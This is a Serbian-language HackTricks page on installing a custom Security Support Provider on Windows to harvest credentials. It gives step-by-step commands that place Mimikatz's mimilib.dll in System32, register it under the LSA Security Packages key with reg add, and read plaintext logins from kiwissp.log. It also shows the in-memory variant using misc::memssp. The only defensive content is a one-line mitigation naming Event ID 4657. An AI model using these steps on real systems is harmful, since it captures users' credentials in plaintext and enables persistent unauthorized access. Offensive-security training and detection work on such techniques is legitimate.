hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

2.6 KiB

Prilagođeni SSP

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Prilagođeni SSP

Saznajte šta je SSP (Security Support Provider) ovde.
Možete kreirati svoj SSP da biste uhvatili u čistom tekstu kredencijale korišćene za pristup mašini.

Mimilib

Možete koristiti binarni fajl mimilib.dll koji pruža Mimikatz. Ovo će zabeležiti sve kredencijale u čistom tekstu unutar fajla.
Ubacite dll fajl u C:\Windows\System32\
Dobijte listu postojećih LSA Security paketa:

{% code title="napadac@cilj" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Dodajte mimilib.dll na listu pružalaca sigurnosti (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

I nakon ponovnog pokretanja, svi pristupni podaci mogu se pronaći u čistom tekstu u C:\Windows\System32\kiwissp.log

U memoriji

Takođe možete ubaciti ovo direktno u memoriju koristeći Mimikatz (imajte na umu da to može biti malo nestabilno/neispravno):

privilege::debug
misc::memssp

Ovo neće preživeti ponovno pokretanje.

Mitigacija

Događaj ID 4657 - Revizija kreiranja/izmene HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages